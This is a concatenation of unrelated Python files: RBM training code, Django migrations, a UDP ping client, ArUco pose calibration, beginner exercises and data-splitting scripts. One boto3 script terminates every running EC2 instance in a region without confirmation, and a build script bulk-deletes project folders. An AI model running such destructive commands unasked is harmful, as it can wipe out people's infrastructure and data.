self.plot['_Energy'] = \
"Energy = $- \sum \\frac{1}{2 \sigma_i^2}(v_i - b_i)^2 " +\
"- \sum \\frac{1}{\sigma_i^2} w_{ij} v_i h_j " +\
"- \sum c_j h_j$"
self.plot['Error'] = np.empty(1)
self.plot['_Error'] = \
"Error = $\sum (data - p[v = data|\Theta])^2$"
self.plot['Update'] = np.empty(1)
self.plot['_Update'] = \
"Update = $\\lambda \\cdot \\left|\\left|\\Delta W\\right|\\right|$"
self.results = {}
#
# iterative training
#
def train(self, data, epochs = 10000,
method = 'cdn', sampling_steps = 3, sampling_stat = 1,
learning_rate = 0.025,
learning_factor_weights = 1.0, learning_factor_vbias = 0.1,
learning_factor_hbias = 0.1, learning_factor_vlvar = 0.01,
plot_points = 200):
# check if python module 'time' is available
try:
import time
except:
print "mp_gbrbm.train: could not import python module 'time'"
quit()
# initialize learning rates for weights, biases and logvar
# using relative factors
self.W_rate = learning_rate * learning_factor_weights
self.v_bias_rate = learning_rate * learning_factor_vbias
self.v_lvar_rate = learning_rate * learning_factor_vlvar
self.h_bias_rate = learning_rate * learning_factor_hbias
# initialize weights with respect to adjacence
self.W *= self.A
# initialize start time
self.time_start = time.clock()
if self.create_plots:
# initialize epoch offset
if self.plot['x'].shape[0] == 1:
epoch_offset = 0
else:
epoch_offset = \
self.plot['x'][self.plot['x'].shape[0] - 1]
# initialize values for plots
count = max(int(epochs / plot_points), 1)
error = 0
energy = 0
update = 0
estim_epoch = min(200, epochs)
# define sampling function
sample = {
'cd': lambda data:
self.sample_cd(data),
'cdn': lambda data:
self.sample_cdn(data, sampling_steps, sampling_stat),
'ml': lambda data:
self.sample_ml(data)
}[method]
method_str = {
'cd': 'CD',
'cdn': 'CD-k (%d, %d)' % (sampling_steps, sampling_stat),
'ml': 'ML'
}[method]
# main loop
for epoch in xrange(1, epochs + 1):
# use prefered sampling method
v_data, h_data, v_model, h_model = sample(data)
# estimate time
if epoch == estim_epoch:
delta = time.clock() - self.time_start
estim_time = delta * epochs / float(epoch)
print "...training %s epochs with %s, est. time: %.2fs" % \
(epochs, method_str, estim_time)
# arrays for plots
if self.create_plots:
# calculate energy, error etc.
error += self.error(v_data, v_model)
energy += self.energy(v_model, h_model)
update += self.norm_delta_W(v_data, h_data, v_model, h_model)
# insert data for plots
if epoch % count == 0:
self.plot['x'] = \
np.append(self.plot['x'], epoch + epoch_offset)
self.plot['Error'] = \
np.append(self.plot['Error'], error / count)
self.plot['Energy'] = \
np.append(self.plot['Energy'], energy / count)
self.plot['Update'] = \
np.append(self.plot['Update'], update / count)
# reset energy and error
error = 0
energy = 0
update = 0
# update params
self.update_params(v_data, h_data, v_model, h_model)
#copy results
self.results['weights'] = self.W
self.results['vbias'] = self.v_bias
self.results['hbias'] = self.h_bias
self.results['vsdev'] = np.sqrt(np.exp(self.v_lvar))
#
# sampling
#
#
# contrastive divergency sampling (CD)
#
def sample_cd(self, data):
v_data = data
h_data = self.h_expect(v_data)
v_model = self.v_expect(self.h_values(h_data))
h_model = self.h_expect(v_model)
return v_data, h_data, v_model, h_model
#
# k-step contrastive divergency sampling (CD-k)
#
def sample_cdn(self, data, n = 1, m = 1):
v_data = data
h_data = self.h_expect(data)
v_model = np.zeros(shape = v_data.shape)
h_model = np.zeros(shape = h_data.shape)
for i in range(m):
for step in range(1, n + 1):
if step == 1:
h_values = self.h_values(h_data)
else:
h_values = self.h_values(h_expect)
v_expect = self.v_expect(h_values)
if step < n:
v_values = self.v_values(v_expect)
h_expect = self.h_expect(v_values)
else:
h_expect = self.h_expect(v_expect)
v_model += v_expect
h_model += h_expect
v_model /= m
h_model /= m
return v_data, h_data, v_model, h_model
#
# persistent contrastive divergency sampling (persistentCD)
# TODO: implement
def sample_persistentCD(self, data, n = 1, m = 1):
return
#
# maximum likelihood sampling (ML)
# TODO: don't sample from visible units
def sample_ml(self, data, n = 5, m = 10):
v_data = data
h_data = self.h_expect(data)
v_model = np.zeros(shape = v_data.shape)
h_model = np.zeros(shape = h_data.shape)
for i in range(m):
for step in range(1, n + 1):
if step == 1:
h_values = self.h_values(h_data)
else:
h_values = self.h_values(h_expect)
v_expect = self.v_expect(h_values)
if step < n:
v_values = self.v_values(v_expect)
h_expect = self.h_expect(v_values)
else:
h_expect = self.h_expect(v_expect)
v_model += v_expect
h_model += h_expect
v_model /= m
h_model /= m
return v_data, h_data, v_model, h_model
#
# unit reconstruction
#
# expected values of visible units
def v_expect(self, h_values):
return self.v_bias + np.dot(h_values, self.W.T)
# gauss distributed random values of visible units
def v_values(self, expect):
return np.random.normal(expect, np.exp(self.v_lvar))
# expected values of hidden units
def h_expect(self, v_values):
return 1.0 / (1 + np.exp(-(self.h_bias +
np.dot(v_values / np.exp(self.v_lvar), self.W))))
# bernoulli distributed random values of hidden units
def h_values(self, expect):
return expect > np.random.rand(expect.shape[0], expect.shape[1])
#
# update params
#
# calculate all deltas using same params and update
def update_params(self, v_data, h_data, v_model, h_model):
delta_W = self.delta_W(v_data, h_data, v_model, h_model)
delta_v_bias = self.delta_v_bias(v_data, v_model)
delta_h_bias = self.delta_h_bias(h_data, h_model)
delta_v_lvar = self.delta_v_lvar(v_data, h_data, v_model, h_model)
self.W += self.W_rate * delta_W
self.v_bias += self.v_bias_rate * delta_v_bias
self.h_bias += self.h_bias_rate * delta_h_bias
self.v_lvar += self.v_lvar_rate * delta_v_lvar
# update rule for weight matrix
def delta_W(self, v_data, h_data, v_model, h_model):
data = np.dot(v_data.T, h_data) / v_data.shape[0]
model = np.dot(v_model.T, h_model) / v_model.shape[0]
delta_W = (data - model) * self.A / np.exp(self.v_lvar).T
return delta_W
# update rule for visible units biases
def delta_v_bias(self, v_data, v_model):
data = np.mean(v_data, axis = 0).reshape(self.v_bias.shape)
model = np.mean(v_model, axis = 0).reshape(self.v_bias.shape)
delta_v_bias = (data - model) / np.exp(self.v_lvar)
return delta_v_bias
# update rule for hidden units biases
def delta_h_bias(self, h_data, h_model):
data = np.mean(h_data, axis = 0).reshape(self.h_bias.shape)
model = np.mean(h_model, axis = 0).reshape(self.h_bias.shape)
delta_h_bias = data - model
return delta_h_bias
# update rule for visible units logarithmic variance
def delta_v_lvar(self, v_data, h_data, v_model, h_model):
data = np.mean(0.5 * (v_data - self.v_bias) ** 2 - v_data *
np.dot(h_data, self.W.T), axis = 0).reshape(self.v_lvar.shape)
model = np.mean(0.5 * (v_model - self.v_bias) ** 2 - v_model *
np.dot(h_model, self.W.T), axis = 0).reshape(self.v_lvar.shape)
delta_v_lvar = (data - model) / np.exp(self.v_lvar)
return delta_v_lvar
#
# energy, error etc.
#
# calculate energy
def energy(self, v_model, h_model):
v_term = np.sum((v_model - self.v_bias) ** 2 / np.exp(self.v_lvar)) / 2
h_term = np.sum(h_model * self.h_bias)
W_term = np.sum(v_model * np.dot(h_model, self.W.T) / np.exp(self.v_lvar))
energy = - (v_term + h_term + W_term)
return energy
# calculate error
def error(self, v_data, v_model):
error = np.sum((v_data - v_model) ** 2)
return error
# calculate update
def norm_delta_W(self, v_data, h_data, v_model, h_model):
delta_W = self.delta_W(v_data, h_data, v_model, h_model)
norm = np.linalg.norm(delta_W)
return self.W_rate * norm
## def run_visible(self, data):
## """
## Assuming the RBM has been trained (so that weights for the network have been learned),
## run the network on a set of visible units, to get a sample of the hidden units.
##
## Parameters
## ----------
## data: A matrix where each row consists of the states of the visible units.
##
## Returns
## -------
## hidden_states: A matrix where each row consists of the hidden units activated from the visible
## units in the data matrix passed in.
## """
##
## # get Number of training samples
## int_samples = data.shape[0]
##
## # Create a matrix, where each row is to be the hidden units (plus a bias unit)
## # sampled from a training example.
## hidden_states = np.ones((int_samples, self.hidden + 1))
##
## # Insert bias units of 1 into the first column of data.
## data = np.insert(data, 0, 1, axis = 1)
##
## # Calculate the activations of the hidden units.
## hidden_activations = np.dot(data, self.weights)
## # Calculate the probabilities of turning the hidden units on.
## hidden_probs = self._logistic(hidden_activations)
## # Turn the hidden units on with their specified probabilities.
## hidden_states[:,:] = hidden_probs > np.random.rand(int_samples, self.hidden + 1)
## # Always fix the bias unit to 1.
## # hidden_states[:,0] = 1
##
## # Ignore the bias units.
## hidden_states = hidden_states[:,1:]
## return hidden_states
##
## # TODO: Remove the code duplication between this method and `run_visible`?
## def run_hidden(self, data):
## """
## Assuming the RBM has been trained (so that weights for the network have been learned),
## run the network on a set of hidden units, to get a sample of the visible units.
##
## Parameters
## ----------
## data: A matrix where each row consists of the states of the hidden units.
##
## Returns
## -------
## visible_states: A matrix where each row consists of the visible units activated from the hidden
## units in the data matrix passed in.
## """
##
## # get Number of training samples
## int_samples = data.shape[0]
##
## # Create a matrix, where each row is to be the visible units (plus a bias unit)
## # sampled from a training example.
## visible_states = np.ones((int_samples, self.visible + 1))
##
## # Insert bias units of 1 into the first column of data.
## data = np.insert(data, 0, 1, axis = 1)
##
## # Calculate the activations of the visible units.
## visible_activations = np.dot(data, self.weights.T)
## # Calculate the probabilities of turning the visible units on.
## visible_probs = self._logistic(visible_activations)
## # Turn the visible units on with their specified probabilities.
## visible_states[:,:] = visible_probs > np.random.rand(int_samples, self.visible + 1)
## # Always fix the bias unit to 1.
## # visible_states[:,0] = 1
##
## # Ignore the bias units.
## visible_states = visible_states[:,1:]
## return visible_states
##
## def daydream(self, num_samples):
## """
## Randomly initialize the visible units once, and start running alternating Gibbs sampling steps
## (where each step consists of updating all the hidden units, and then updating all of the visible units),
## taking a sample of the visible units at each step.
## Note that we only initialize the network *once*, so these samples are correlated.
##
## Returns
## -------
## samples: A matrix, where each row is a sample of the visible units produced while the network was
## daydreaming.
## """
##
## # Create a matrix, where each row is to be a sample of of the visible units
## # (with an extra bias unit), initialized to all ones.
## samples = np.ones((num_samples, self.visible + 1))
##
## # Take the first sample from a uniform distribution.
## samples[0,1:] = np.random.rand(self.visible)
##
## # Start the alternating Gibbs sampling.
## # Note that we keep the hidden units binary states, but leave the
## # visible units as real probabilities. See section 3 of Hinton's
## # "A Practical Guide to Training Restricted Boltzmann Machines"
## # for more on why.
## for i in range(1, num_samples):
## visible = samples[i-1,:]
##
## # Calculate the activations of the hidden units.
## hidden_activations = np.dot(visible, self.weights)
## # Calculate the probabilities of turning the hidden units on.
## hidden_probs = self._logistic(hidden_activations)
## # Turn the hidden units on with their specified probabilities.
## hidden_states = hidden_probs > np.random.rand(self.hidden + 1)
## # Always fix the bias unit to 1.
## hidden_states[0] = 1
##
## # Recalculate the probabilities that the visible units are on.
## visible_activations = np.dot(hidden_states, self.weights.T)
## visible_probs = self._logistic(visible_activations)
## visible_states = visible_probs > np.random.rand(self.visible + 1)
## samples[i,:] = visible_states
##
## # Ignore the bias units (the first column), since they're always set to 1.
## return samples[:,1:]
#if __name__ == '__main__':
# sdev = 0.025 * np.ones((1, 4))
# gbrbm = gbrbm(1, 3, stddev = 0.5)
|
import tensorflow as tf
import numpy as np
import matplotlib
matplotlib.use('Agg')
from multiprocessing import Pool
from queue import Queue
from sklearn.model_selection import ParameterGrid
from sklearn import datasets
from sklearn.model_selection import train_test_split
from pandas import read_csv
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import pandas as pd
class Fuzzification():
def __init__(self, num_interval = None):
self.num_interval = num_interval
def fuzzify(self,timeseries):
timeseries = np.array(timeseries)
min_value = min(timeseries)[0]
max_value = max(timeseries)[0]
# print (min_value)
# print (round(max_value))
u = [min_value, max_value]
print (u)
self.interval = (u[1] - u[0]) / self.num_interval
print (self.interval)
# print (self.number_of_interval)
arr = []
for i in range(len(timeseries)):
# print (self.timeseries[i][0])
# print ((self.timeseries[i][0] - u[0])/self.interval)
arr.append(round((timeseries[i][0] - u[0])/self.interval))
# print (arr)
return arr
|
# Generated by Django 2.2.17 on 2021-01-30 22:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admin', '0019_update_disabled_accounts_aliases'),
]
operations = [
migrations.AlterField(
model_name='domain',
name='name',
field=models.CharField(help_text='The domain name', max_length=253, unique=True, verbose_name='name'),
),
]
|
# PYthon 3.7.3 use cse machine
from socket import *
import sys
import time
import statistics
def ping (host,port):
serverName = host
serverPort = port
clientSocket = socket(AF_INET, SOCK_DGRAM)
#Create UDP client socket
seqnum = 3331
pingtimes = 0
rtts = []
while(pingtimes < 15):
pingtimes += 1
starttime = time.time() * 1000
message = 'PING' + ' ' + str(seqnum) + ' ' + str(starttime) + '\r\n'
clientSocket.sendto(message.encode('utf-8'),(serverName, serverPort))
clientSocket.settimeout(0.6)
#Waits up to 600 ms to receive a reply
try:
modifiedMessage, serverAddress = clientSocket.recvfrom(2048)
gettime = time.time() * 1000
usetime = gettime - starttime
rtts.append(usetime)
print(f'Ping to {serverName}, seq = {seqnum}, rtt = {int(usetime)} ms')
seqnum += 1
except timeout:
print(f'Ping to {serverName}, seq = {seqnum}, timeout')
seqnum += 1
print('transmission finished')
if len(rtts) > 0:
minrtt = min(rtts)
maxrtt = max(rtts)
avertt = statistics.mean(rtts)
print(f'MINIMUM RTT is {int(minrtt)} ms, MAXIMUM RTT is {int(maxrtt)} ms, AVERAGE RTT is {int(avertt)} ms\n')
else:
print('ALL TIME OUT,Check Host port again\n')
clientSocket.close()
# Close the socket
if __name__ == '__main__':
if len(sys.argv) < 3:
print('required host prot')
exit(1)
host = sys.argv[1]
port = int (sys.argv[2])
ping(host, port)
|
import sys
import os
sys.path.append(os.path.dirname(__file__))
import func_sign_prob_plugin
#print(f'sys-path >{sys.path}<')
def create_cutter_plugin():
return func_sign_prob_plugin.FuncSignProbCutterPlugin()
|
#!/usr/bin/python3
# Task 7. Error code #1
if __name__ == "__main__":
import sys
import requests
the_url = sys.argv[1]
my_req = requests.get(the_url)
the_resp = my_req.status_code
if the_resp >= 400:
print("Error code: {}".format(the_resp))
else:
print(my_req.text)
|
import os
from time import sleep
from shutil import copyfile
import db
def rename_file(file):
path = os.getcwd()
path = os.path.join(path,'__pycache__/')
new_file = file.split('.')
file = os.path.join(path,file)
new_file = new_file[0]+'.'+new_file[2]
new_file = os.path.join(path,new_file)
if 'Auto_update' in new_file:
new_file = new_file.replace('Auto_update','Auto_update2')
# print('!!!!!!!!!!!!!!!!')
# print('!!!!!!!!!!!!!!!!')
# print('!!!!!!!!!!!!!!!!')
# print(file)
# print(new_file)
os.rename(file,new_file)
def get_modules():
modules = os.listdir('__pycache__/')
# print(modules)
path = os.path.join(os.getcwd(),'__pycache__')
modules_path = [os.path.join(path,file) for file in modules]
return modules_path
def get_Mission_files():
modules = os.listdir('./')
modules = [file for file in modules if 'Mission' in file ]
print(modules)
path = os.getcwd()
Mission_path = [os.path.join(path,file) for file in modules]
print(Mission_path)
return Mission_path
def get_folder_files(folder_name):
modules = os.listdir(folder_name)
# print(modules)
path = os.path.join(os.getcwd(),folder_name)
modules_path = [os.path.join(path,file) for file in modules]
return modules_path
def clean_info():
file_alliance = r'.\ini\Alliance_num.ini'
file_offer_config = r'.\ini\Offer_config.ini'
content = r'{}'
file_offer = r'.\ini\Offer.ini'
with open(file_alliance,'w') as f:
f.write(content)
with open(file_offer,'w') as f:
f.write(content)
with open(file_offer_config,'w') as f:
f.write(content)
def main():
clean_info()
db.update_version()
# get all file abs path in dir'__pycache__'/
modules_path = get_modules()
print(modules_path)
# delete them all
[os.remove(file) for file in modules_path]
sleep(2)
# compile the src dir
os.system('python -m compileall')
sleep(2)
# get all compiled file abs path in dir'__pycache__'/
modules_path = get_modules()
# remove mission files
[os.remove(file) for file in modules_path if 'Mission' in file]
sleep(1)
# get all file names in dir '__pycache__'/
modules = os.listdir('__pycache__/')
# rename all these files so that they can run everywhere
[rename_file(module) for module in modules]
sleep(2)
# move file in cash into Coding\
src = r'C:\Coding\src'
driver = r'C:\Coding\src\driver'
ini = r'C:\Coding\src\ini'
lp = r'C:\Coding\src\lp'
ui = r'C:\Coding\src\ui'
modules_path_src = get_folder_files(src)
[os.remove(file) for file in modules_path_src if '.' in file and '.git' not in file]
modules_path_driver = get_folder_files(driver)
[os.remove(file) for file in modules_path_driver]
modules_path_ini = get_folder_files(ini)
[os.remove(file) for file in modules_path_ini]
modules_path_lp = get_folder_files(lp)
[os.remove(file) for file in modules_path_lp ]
modules_path_ui = get_folder_files(ui)
[os.remove(file) for file in modules_path_ui]
# __pycache__
modules_path = get_modules()
for file in modules_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(src,filename)
copyfile(file,src_file)
# src
Mission_path = get_Mission_files()
for file in Mission_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(src,filename)
copyfile(file,src_file)
# driver
Mission_path = get_folder_files('driver')
for file in Mission_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(driver,filename)
copyfile(file,src_file)
# ini
Mission_path = get_folder_files('ini')
for file in Mission_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(ini,filename)
copyfile(file,src_file)
# lp
Mission_path = get_folder_files('lp')
for file in Mission_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(lp,filename)
copyfile(file,src_file)
# ui
Mission_path = get_folder_files('ui')
for file in Mission_path:
dirname,filename = os.path.split(file)
src_file = os.path.join(ui,filename)
copyfile(file,src_file)
# [copyfile(file,src) for file in modules_path]
print('Compile finished.........')
# modules = [module.strip('.py') for module in modules]
command = '..\StartGit.bat'
os.system(command)
# db.update_version()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# break 跳出最近所在的循环
# continue 跳到最近所在循环的开头处(来到循环的首行)
# pass 占位语句,什么事也不做
# 循环else模块 只有当循环正常离开时才会执行(没有触发break)
# 示例,break
res = i = 0
while True:
i += 1
res += i
if i == 100:
break
print(res)
# 示例,continue
# 求1~100之内的奇数的和
res = i = 0
while i < 100:
i += 1
if i % 2 == 0:
continue
res += i
print(res)
# 示例,循环else模块
res = i = 0
while i < 100:
i += 1
res += i
else:
print(res)
# 示例,判断质数
for y in range(2, 100):
x = y // 2
while x > 1:
if y % x == 0:
# print(y, 'has a factor:', x)
break
x -= 1
else:
print(y, '是一个质数')
|
from rest_framework import serializers
from api.models import History
class HistorySerializer(serializers.ModelSerializer):
class Meta:
model = History
fields = ('id', 'user', 'ip_address', 'browser_info', 'location', 'created_at', 'updated_at')
|
#Core data types:
'''
List:
mutable
declare: a=[1,2,3]
access: a[1],a[1:4]
modify: a[1]=100
a.append(8),a.extend([45,65]),a.insert(1,45)
delete: del a[2],del a[2:5]
a.pop(),a.pop(2),del a
a.clear()
Tuple:
immutable- cannot be changed
declare: a=(1,2,3,4)
access: a[1]
modify: not possible
deletion not possible
del a - entire deletion is possible
set:
mutable
Unorderd lists without duplicates
a={1,2,3,4}
index accessing is not possible
adding ele: a.add(ele)
a.update({2,3,99})
delete: del a - entire set is deleted
dictionary:
key&value pair
a={1:23,2:34,3:45}
access: a[key]
modify: a[key]=new value,a[key]=update value, a.update({key:value,key:value})
deletion: del a, del a[key]
'''
#Adding elements into dict:
#METHOD-1:
'''
a={}
for i in range(2): #keys
k=input("enter a key:") #s1
v=[]
for j in range(2): #values
m=int(input("enter marks: "))
v.append(m) #[34,54]
a[k]=v #a['s1']=[34,54],a['s2']=[65,54]
print(a)
'''
#METHOD-2:
'''
a={}
n=int(input("enter key count:"))
for i in range(1,n+1): #keys
k=input("enter a key:")
v=[]
p=int(input("enter a value count:"))
for j in range(p): #values
m=int(input("enter marks: "))
v.append(m)
a[k]=v
print(a)
'''
#METHOD-3:
a={}
n=int(input("enter key count:"))
for i in range(1,n+1):
k=input("enter a key:")
a[k]=list(map(int,input().split()))
print(a)
|
# Generated by Django 2.1.9 on 2019-08-12 07:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('whiskydatabase', '0018_auto_20190805_1341'),
]
operations = [
migrations.AddField(
model_name='whiskyinfo',
name='general_desc',
field=models.TextField(blank=True, null=True),
),
]
|
while True:
result = []
N = int(input('Enter integral number: '))
if N % 2 == 1:
print('Yes')
else:
print('No')
for element in str(N):
result.append(element)
no_of_digits = len(result)
print(f'There are {no_of_digits} digit(s) in the integral number {N}')
|
# Generated by Django 2.2 on 2020-10-04 14:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instagram', '0010_auto_20201004_1709'),
]
operations = [
migrations.AlterField(
model_name='socinstaproxy',
name='location',
field=models.CharField(default='Amsterdam', max_length=200, verbose_name='Location'),
),
]
|
# The following code is used to watch a video stream, detect Aruco markers, and use
# a set of markers to determine the posture of the camera in relation to the plane
# of markers.
#
# Assumes that all markers are on the same plane, for example on the same piece of paper
#
# Requires camera calibration (see the rest of the project for example calibration)
import numpy as np
import cv2
import cv2.aruco as aruco
import os
import pickle
from numpy.linalg import inv
# Constant parameters used in Aruco methods
ARUCO_PARAMETERS = aruco.DetectorParameters_create()
ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)
# Create grid board object we're using in our stream
CHARUCO_BOARD = aruco.CharucoBoard_create(squaresX=10,
squaresY=6,
squareLength=0.04,
markerLength=0.03,
dictionary=ARUCO_DICT)
def readCameraCalibration():
# Check for camera calibration data
f = open('data/calibration/Logitech/C1.pckl', 'rb')
(cameraMatrix, distCoeffs, _, _) = pickle.load(f)
f.close()
if cameraMatrix is None or distCoeffs is None:
print("Calibration issue. Remove ./calibration.pckl and recalibrate your camera with CalibrateCamera.py.")
exit()
else:
print('Calibration file read succesfully!')
return cameraMatrix, distCoeffs
def getCalibrationFrame():
cam = cv2.VideoCapture(206)
cam.set(cv2.CAP_PROP_FRAME_WIDTH,1920)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT,1080)
cam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
fr = 0
while(cam.isOpened()):
ret, img = cam.read()
if ret:
fr += 1
if fr == 30:
return img
#return cv2.undistort(img, cameraMatrix, distCoeffs)
def estimatePoseToBoard(_img, cameraMatrix, distCoeffs):
img = _img.copy()
# grayscale image
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect Aruco markers
corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, ARUCO_DICT, parameters=ARUCO_PARAMETERS)
# Refine detected markers
# Eliminates markers not part of our board, adds missing markers to the board
corners, ids, rejectedImgPoints, recoveredIds = aruco.refineDetectedMarkers(image = gray,
board = CHARUCO_BOARD,
detectedCorners = corners,
detectedIds = ids,
rejectedCorners = rejectedImgPoints,
cameraMatrix = cameraMatrix,
distCoeffs = distCoeffs)
## REMOVE ID 49 (the robot marker)
corners, ids = removeMarkerById(corners, ids, 49)
img = aruco.drawDetectedMarkers(img, corners, ids=ids, borderColor=(0, 0, 255))
rvec, tvec = None, None
# Only try to find CharucoBoard if we found markers
if ids is not None and len(ids) > 10:
# Get charuco corners and ids from detected aruco markers
response, charuco_corners, charuco_ids = aruco.interpolateCornersCharuco(markerCorners=corners,
markerIds=ids,
image=gray,
board=CHARUCO_BOARD)
# Require more than 20 squares
if response is not None and response > 20:
# Estimate the posture of the charuco board
pose, rvec, tvec = aruco.estimatePoseCharucoBoard(charucoCorners=charuco_corners,
charucoIds=charuco_ids,
board=CHARUCO_BOARD,
cameraMatrix=cameraMatrix,
distCoeffs=distCoeffs)
img = aruco.drawAxis(img, cameraMatrix, distCoeffs, rvec, tvec, 2)
cv2.imwrite('calib_board.png', img)
else:
print('Calibration board is not fully visible')
assert 1==0
return cv2.Rodrigues(rvec)[0], tvec
def estimatePoseToMarker(_img, cameraMatrix, distCoeffs):
img = _img.copy()
# grayscale image
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Detect Aruco markers
corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, ARUCO_DICT, parameters=ARUCO_PARAMETERS)
## Keep ID 49 (the robot marker)
corners, ids = keepMarkerById(corners, ids, 49)
img = aruco.drawDetectedMarkers(img, corners, ids=ids, borderColor=(0, 0, 255))
rvec, tvec, _ = aruco.estimatePoseSingleMarkers(corners=corners,
markerLength=0.1965,
cameraMatrix=cameraMatrix,
distCoeffs=distCoeffs)
img = aruco.drawAxis(img, cameraMatrix, distCoeffs, rvec, tvec, 2)
cv2.imwrite('calib_marker.png', img)
return cv2.Rodrigues(rvec)[0], tvec.reshape(3,1)
def removeMarkerById(corners, ids, id2remove):
newCorners = []
newIds = []
for i in range(0,len(ids)):
if np.asscalar(ids[i]) != id2remove:
newCorners.append(corners[i])
newIds.append(np.asscalar(ids[i]))
return newCorners, np.asarray(newIds).reshape(-1,1)
def keepMarkerById(corners, ids, id2keep):
newCorners = []
newIds = []
for i in range(0,len(ids)):
if np.asscalar(ids[i]) == id2keep:
newCorners.append(corners[i])
newIds.append(np.asscalar(ids[i]))
return newCorners, np.asarray(newIds).reshape(-1,1)
def getPoseFromRotationTranslation(rvec, tvec):
C = np.concatenate((rvec, tvec), axis=1)
return np.concatenate((C, np.array([0,0,0,1]).reshape(1,4)), axis=0)
def getRotationTranslationFromPose(C):
rvec = C[:3,:3]
tvec = C[:3,-1]
return rvec, tvec
if __name__ == '__main__':
np.set_printoptions(suppress=True)
# Read camera calibration
cameraMatrix, distCoeffs = readCameraCalibration()
# Read one frame (after discarding 30)
img = getCalibrationFrame()
#cv2.imwrite('robot-cameras-calibration.png', img)
rvec_board, tvec_board = estimatePoseToBoard(img, cameraMatrix, distCoeffs)
rvec_marker, tvec_marker = estimatePoseToMarker(img, cameraMatrix, distCoeffs)
# Manual measurements between marker and robot
r = np.eye(3, dtype=float)
t = np.array([0.03, 0.25, -0.510], dtype=float).reshape(3,1)
C_marker2robot = getPoseFromRotationTranslation(r, t)
C_board2camera = getPoseFromRotationTranslation(rvec_board , tvec_board )
C_marker2camera = getPoseFromRotationTranslation(rvec_marker, tvec_marker)
#TESTING
'''
point1, _ = cv2.projectPoints(np.array([0.2,0.,0.], dtype=float).reshape(1,3), rvec_board, tvec_board, cameraMatrix, distCoeffs)
point2, _ = cv2.projectPoints(np.array([0.1, 0., 0.], dtype=float).reshape(1,3), rvec_marker, tvec_marker, cameraMatrix, distCoeffs)
point1 = point1.squeeze().astype(int)
point2 = point2.squeeze().astype(int)
cv2.circle(img, tuple(point1), 10, (0,255,0), -1)
cv2.circle(img, tuple(point2), 10, (255,255,0), -1)
cv2.imwrite('test.png', img)
assert 1==0
'''
#######
C = np.matmul(np.matmul(C_marker2robot, inv(C_marker2camera)), C_board2camera)
p = np.array([0.,0.,0.,1.], dtype=float).reshape(4,1)
pr = np.matmul(C, p)
#print(pr)
# Dump projection matrix to file
f = open('data/calibration/cameras_robot.pckl', 'wb')
pickle.dump((C), f)
f.close()
print('Camera to robot transformation succesfully computed')
|
from collections import defaultdict
import boto3
import time
region = 'us-east-1'
ec2 = boto3.resource('ec2', region_name=region)
ec2_filter = [{'Name': 'instance-state-name', 'Values': ['running']}]
ec2.instances.filter(Filters=ec2_filter).terminate()
instance_status = ec2.instances.filter(Filters=[{
'Name': 'instance-state-name',
'Values': ['running', 'stopping']}])
time.sleep(5)
ec2info = defaultdict()
for instance in instance_status:
ec2info[instance.id] = {
'Type': instance.instance_type,
'ID': instance.id,
'State': instance.state['Name'],
'Private IP': instance.private_ip_address,
}
attributes = ['Type', 'ID', 'State', 'Private IP']
for instance_id, instance in ec2info.items():
for key in attributes:
print("{0}: {1}".format(key, instance[key]))
print("-------------------------")
|
txt1 = 'A tale that was not right'
txt2 = '이 또한 지나가리라.'
print(txt1[3:7])
print(txt1[:6])
print(txt2[-4:])
|
from numpy import genfromtxt
import csv
clusterinfo="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/14/cosine_14.csv"#vnoc
tan="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/test_article_numbers.csv"#test article number
tran="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/training_article_numbers.csv"#training article number
allvector="/Users/mengqizhou/Desktop/datamining/assignment5/feature_vectors.csv"
alllabel="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/binary_class_labels.csv"
folder="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/14/"
vnoc=[]
with open(clusterinfo,'rU') as f:
reader = csv.reader(f)
for row in reader:
vnoc.append(row)
f.close()
temps=[]
for row in vnoc:
temp=[]
for value in row:
if value!='':
temp.append(value)
temps.append(temp)
vnoc=temps
test=genfromtxt(tan,dtype=int,delimiter=',')
#test=np.array(vnoc)
training=genfromtxt(tran,dtype=int,delimiter=',')
#training=np.array(vnoc)
vectors=[]
with open (allvector,'rU') as f:
reader=csv.reader(f)
for row in reader:
vectors.append(row)
f.close()
labels=[]
with open (alllabel,'rU') as f:
reader=csv.reader(f)
for row in reader:
labels.append(row)
f.close()
#figure out for the training data, which cluster it is in
#output:training_vector_1,2,3...8; training_label_1,2,...8
#output: test_vector_1,2,3...; training_label_1,2,...8
for i in range(0,len(vnoc)):
tevs=[]#test vectors
tels=[]#test labels
trvs=[]#training vectors
trls=[]#training labels
for n in vnoc[i]:
num=int(n)
if num in test:
tevs.append(vectors[num])
tels.append(labels[num])
elif num in training:
trvs.append(vectors[num])
trls.append(labels[num])
with open(folder+"test_vectors_"+str(i)+".csv", 'wb') as f:
writer = csv.writer(f)
for item in tevs:
writer.writerow(item)
f.close
with open(folder+"test_labels_"+str(i)+".csv", 'wb') as f:
writer = csv.writer(f)
for item in tels:
writer.writerow(item)
f.close
with open(folder+"training_vectors_"+str(i)+".csv", 'wb') as f:
writer = csv.writer(f)
for item in trvs:
writer.writerow(item)
f.close
with open(folder+"training_labels_"+str(i)+".csv", 'wb') as f:
writer = csv.writer(f)
for item in trls:
writer.writerow(item)
f.close
|
import tkinter as tk
import PyPDF2
from PIL import Image, ImageTk
print('Is this working?')
root = tk.Tk()
root.mainloop()
|
#!/usr/bin/env python
# coding: utf-8
# # Necessary Libraries
# Define the necessary libraies.
